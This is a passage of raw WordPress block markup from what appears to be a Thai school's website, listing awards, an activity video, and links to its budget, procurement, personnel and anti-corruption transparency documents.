/wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" 